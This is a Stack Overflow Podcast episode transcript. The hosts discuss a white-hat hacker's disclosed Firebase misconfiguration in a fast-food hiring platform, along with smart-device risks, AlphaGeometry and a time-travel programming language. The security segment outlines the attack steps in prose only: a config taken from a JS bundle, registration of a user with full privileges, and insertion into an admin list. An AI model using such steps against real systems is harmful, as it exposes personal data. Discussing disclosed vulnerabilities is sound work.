The Stack Overflow Podcast

Hacking the hamburger: How a pentester exposed holes in hundreds of fast-food chains

Episode Summary

Ben and Ryan talk about the hacker who exposed a security vulnerability in AI-powered software, security risks of smart devices, symbolic deduction engines in AI, and the programming language that features time travel.

Episode Notes

A white-hat hacker uncovered security vulnerabilities in an AI-powered hiring system used by fast-food chains and hourly employees around the world. Read the blog post or watch this explainer.

Mariposa is a programming language with time travel.

Want to be an individual contributor (IC) who still amplifies the performance of everyone around you? Be a radiating programmer.

Congratulations to onmyway133, winner of a Stellar Question badge for What does the suspend function mean in a Kotlin Coroutine?.

Episode Transcription

[intro music plays]

Ben Popper With DoiT, optimizing your cloud spend while controlling your costs is easy. By combining intelligent software with expert consultancy and unlimited support, DoiT delivers the true promise of the cloud with ease, not cost. Learn more at doit.com.

BP Hello, everybody. Welcome back to the Stack Overflow Podcast, a place to talk all things software and technology. I'm your host, Ben Popper, Director of Content here at Stack Overflow, joined as I often am by the editor of our blog and impresario of our newsletter, Ryan Donovan. Hey, Ryan. 

Ryan Donovan Hey, Ben. What's news?

BP So there was a fun blog post released recently from a white hat hacker explaining how they got access to the systems of –they claim– half of America's fast food chains simultaneously. I watched the video, I read a bit of the blog. I'd love to dive into the details, but before I do, top line thoughts here, what did you think of the breakdown?

RD I think it's interesting in that it shows how little some companies pay to security. The sort of first line read is that they didn't configure Firebase correctly. They just didn't set up security on it. 

BP So the way the attacker, the white hat, gained access is not complicated. You drop a Firebase config from a JS bundle into Firepwn. Pwn like own? Fire Pwn? 

RD Pwn, yeah. 

BP But if you use Firebase's registration feature to create a new user, you get full privileges, read/write to the Firebase DB. Yikes! The data it exposes and includes is not limited to names, phone numbers, emails, plain text passwords –only some had this– locations of the restaurants themselves, confidential messages, shifts for the following Chatter employees –Chatter is the name of the startup that they used as their backdoor– franchisee managers, and job applicants. Yikes, that is pretty pwned. 

RD But wait, there's more. 

BP But wait, there's more. What comes next? 

RD Well, apparently it got worse and that you could grab the list of admin users and then splice a new entry in there and you got full access to the administrative dashboard. You could accept and deny applicants and refund payments made to Chatter. It seemed like a pretty big hole there. Good thing they were white hat hackers. They were doing this as a test. 

BP They put up the timeline here. So this would have been June that they found this vulnerability. September, they finished the write up and emailed folks. October, the vulnerability is patched. September, the support ticket is closed. No thanks or further contact received despite explicitly requesting it. Well, you’ve got to be nice to your white hats when they come in with a bug bounty like this, I think. 

RD Absolutely. And I think one of the interesting things is that they started it by scanning ‘.ai’ sites, basically assuming that these are put up quickly, put up to get in on the AI bounty but without doing the due diligence of security. 

BP It seems like a reasonable thesis. A lot of people trying to move fast trying to be first, and looking for young companies, which may not have as much experience. Reasonable, not necessarily just because they're AI, but a reasonable way to slice your attack surface. I guess the question in my mind is, in my experience on the enterprise software side, big companies require enormous amounts of upfront legal work and they need you to show all kinds of certifications that you're SOC 2 and ISO-this compliant and I wonder how they got around that or if this was somehow an exemption from that.

RD I don't know. These are techniques that aren't tested for or aren't considered. 

BP This is from Mr. Bruh, MrBruh's Epic Blog. “Welcome gamers to my epic blog. My name is Paul. I'm a programmer from New Zealand and an aspiring cybersecurity “professional.”” Well, Mr. Bruh, you got your moment in the sun and congratulations to you. 

RD If you want to get famous on the internet, go bust some Firebase instances. 

BP It seems like there was a time when web scripts– and I know we had a guest on not too long ago who mentioned that web scripting attacks are still a thing– but it seems like in my experience over the last 5 or 10 years, most of the time the vulnerability is on the database cloud provider/cloud hoster where somebody forgot to properly secure essentially an environment where they're storing stuff online. 

RD I think that's because most of the software exists on that cloud environment. Everything goes through the cloud so if you want to access the actual files, you have to get into the cloud.

BP That makes sense. But I guess it's funny because a lot of times you think about the on-prem attack, the pen testing, the spear phishing, and yet this is one person in New Zealand just poking around on Firebase. 

RD It used to be that you could just have fields execute arbitrary SQL code overflowing their boundaries, doing these sort of shady things just because a lot of web stuff would just execute things as code. So at least we're making steps in the right direction. 

BP I feel like I saw something recently that was pretty interesting. I can't remember what it was now, but more like I was saying, it was about how somebody used a water filter to smuggle some malware into a high security site. They came in and changed the water filter but somehow hooked it up to the network. 

RD Oh, yeah. With everything being a smart device, that's going to be… I saw something where somebody was like, “Why is my washing machine sending 3.6 gigabytes of data every day?” And I was like, “Oh no, you're a botnet, man.”

BP What was it sending? That's good, I want to know. I like that. Mystery surrounds the LG washing machine. 150 megabytes of data per hour from a rogue process and he ended up blocking it on the router. Yikes. We'll have to come back to this one when somebody gets the answer, because it looks like it was either being used to send spam or launch DDoS attacks. That's the hypothesis, but we don't know right now. 

RD And that's the danger with everything being smart. I don't think we need everything to be smart. Bless them for innovating and trying, but my fridge doesn't need Wi-Fi access.

BP I think the one that I read was interesting in the sense that a water filter, I'm not sure it was even a connected or smart one, but you bring it into the right area and it's able to look for Bluetooth and Wi-Fi connections. So it’s sort of that you smuggle it in to get past the air gap of needing to get onto these local networks where the signal isn't that strong. All right, moving on to another thing I wanted to discuss. So the folks over at Google DeepMind have progressively been making their way through the intellectual challenges that humans take on, and they use the Alpha system. So AlphaGo was the one that beat Go, and then they had AlphaZero, they had AlphaCode, which is really good at code, and this week they talked about something called AlphaGeometry, which was able to score in between the silver and gold medalist at the geometry Olympiad, which I guess is a proving ground for some of the best mathematical minds out there. And what was really interesting about this, and you and I have talked about this before, is that they combined what's great about the language model with something new called a symbolic deduction engine. And so they likened this to that famous book, Thinking, Fast and Slow. One system kind of provides intuitive ideas and the other one checks them, reasons through them, uses them to maybe draw conclusions or find a potential pathway forward, and then they go back and forth to solve it, which I thought was pretty cool.

RD I've read some theoretical takes on LLM AIs where they're saying they need to create a logical, semantic, symbolic language for the AIs. And they've done that in other areas– create these formalist logic, and I think that's interesting that they're combining them. Here's a sort of symbolic way of reasoning and then here's the natural language way of assembling them together. 

BP I feel like it makes sense if you think about biological intelligence at the human level, which is to say, at first you're just kind of learning things experientially instinctually through trial and error and a lot of what you're producing is nonsense. And then over time, people give you symbols and structures and tools that let you go farther with that intelligence. So in this blog post, they wrote that language models excel at identifying general patterns and relationships and data. They can quickly predict potentially useful contracts, but they often lack the ability to reason rigorously or explain their decisions. Sounds like children. That sounds like my kids. Symbolic deduction engines, on the other hand, are based on formal logic and use clear rules to arrive at conclusions. 

RD From what I remember of high school geometry, and geometry was honestly one of my favorite math subjects, it was a lot of applying rules, applying techniques. You could just find the way into the puzzle and then follow the steps down. 

BP There was a quote in here that I thought was good from someone who had gotten the gold medal, and it said, “The AlphaGeometry output is impressive because it's both verifiable and clean. It uses classical geometry rules with angles and similar triangles just as students do,” and so it's not like it found a new way to do this. And somebody, to your point, Ryan, somebody who's not just a gold medalist, but a Fields medalist, we're talking a serious mathematician here said, “It makes perfect sense to me that researchers in AI are trying their hands on geometry problems because finding solutions for them works a little bit like chess in the sense that we have a rather small number of sensible moves at every step.” But I still find it stunning that they could make it work. 

RD Anybody who's doing rule-based deduction, AI is coming for your job. When's the Fields Medal going to be awarded to AlphaGeometry?

BP Right, like how Sony gave that photography medal to the guy. They gave their big prize to the AI picture. That would be interesting if the test could be taken online so then AlphaGeometry could enter. All right, Ryan, I wanted to bring something up. Maybe we can get some feedback from the community. You mentioned this last time– your next blog post, a must read, is going to be about time travel. Give the readers just a little, not a spoiler, a little teaser here. 

RD Sure. Well, as we talked about last time, the time travel language Mariposa does interesting things. But in looking at it, during the 80’s and 90’s there was a whole set of little research languages that were about managing time and logically computating the time for hardware processes, mostly. I haven't been able to find a lot about it because it seems very much centered around two or three figures with a little bit of other stuff, and it's also from the 80’s so there's not a whole lot there. But there's a lot of languages built off of Prolog, which I think is an old functional language, very symbolic too. And then of course there's the future quantum stuff. Everything is entangled.

BP We've talked once or twice on the podcast about the fact that in a sort of theoretical or a very limited lab environment, they have entangled data from one side of the world to the other and basically teleported it. It didn't go through a wire or a cable. It was entangled at the quantum level and when they interacted with it in one place, its state changed in another, which is pretty hard to wrap your mind around. 

RD And there's a paper that goes through this theoretical approach of sending information backwards a tick. There's arguments that that's not how quantum physics and entanglement work, but isn't it fun to think about it? 

BP Prolog first appeared in 1972. Robert Kowalski has a credit here, and it says, “A logic programming language that had its origins in AI and computational linguistics.” All right, that'll be fun. So you're going to try to find some folks to talk to on this? 

RD I don't know if those folks are still around. I'm just going to dip my toe into it and see what the time is about. 

BP Okay, cool. All right, last one. I just want to make a recommendation for a blog post. I'll put it in the show notes. It's not new, it's from the end of 2023. It's called the “Radiating Programmer,” and it's about folks who want to be individual contributors, but who also want to boost the productivity of everyone around them and do so in a way that makes their own jobs easier by getting everybody communicating in the same way. So this one has a bunch of ideas about what ceremonies they call them, the way a scrum is a ceremony you could use to communicate. But I think more interestingly, it has the idea of pushing information out rather than waiting for someone to come and ask you to pull from you. And I just thought this was cool because that's kind of the thesis of Stack Overflow for Teams. The more you can get the information out by answering the question once or by writing an article on it, the easier it is for other people to learn from that, and that extends your influence within the organization.

RD And I've heard from folks that the real value of the senior level programmers are not that they're putting out the most code, but that they are helping everyone else become productive. They are stores of information and coding practices. 

BP Yeah, I think that's right.

[music plays]

BP All right, everybody. It is that time of the show. Let's get down with somebody who came on Stack Overflow and helped to spread a little knowledge or add a little bit of curiosity. Congrats to onmyway133, awarded a Stellar Question Badge. That means the question has been saved by over 100 other users. “What does the suspend function mean in a Kotlin Coroutine?” Helped 220,000 people, so very helpful to a large group of people. As always, I am Ben Popper, Director of Content here at Stack Overflow. Thanks for listening. 

RD I'm Ryan Donovan. I edit the blog here at Stack Overflow. You can find the blog at stackoverflow.blog. And if you want to reach out to me on Twitter, perhaps about time and programming in time, you can find me @RThorDonovan. 

BP Sweet. All right, everybody. Thanks for listening, and we will talk to you soon.

[outro music plays]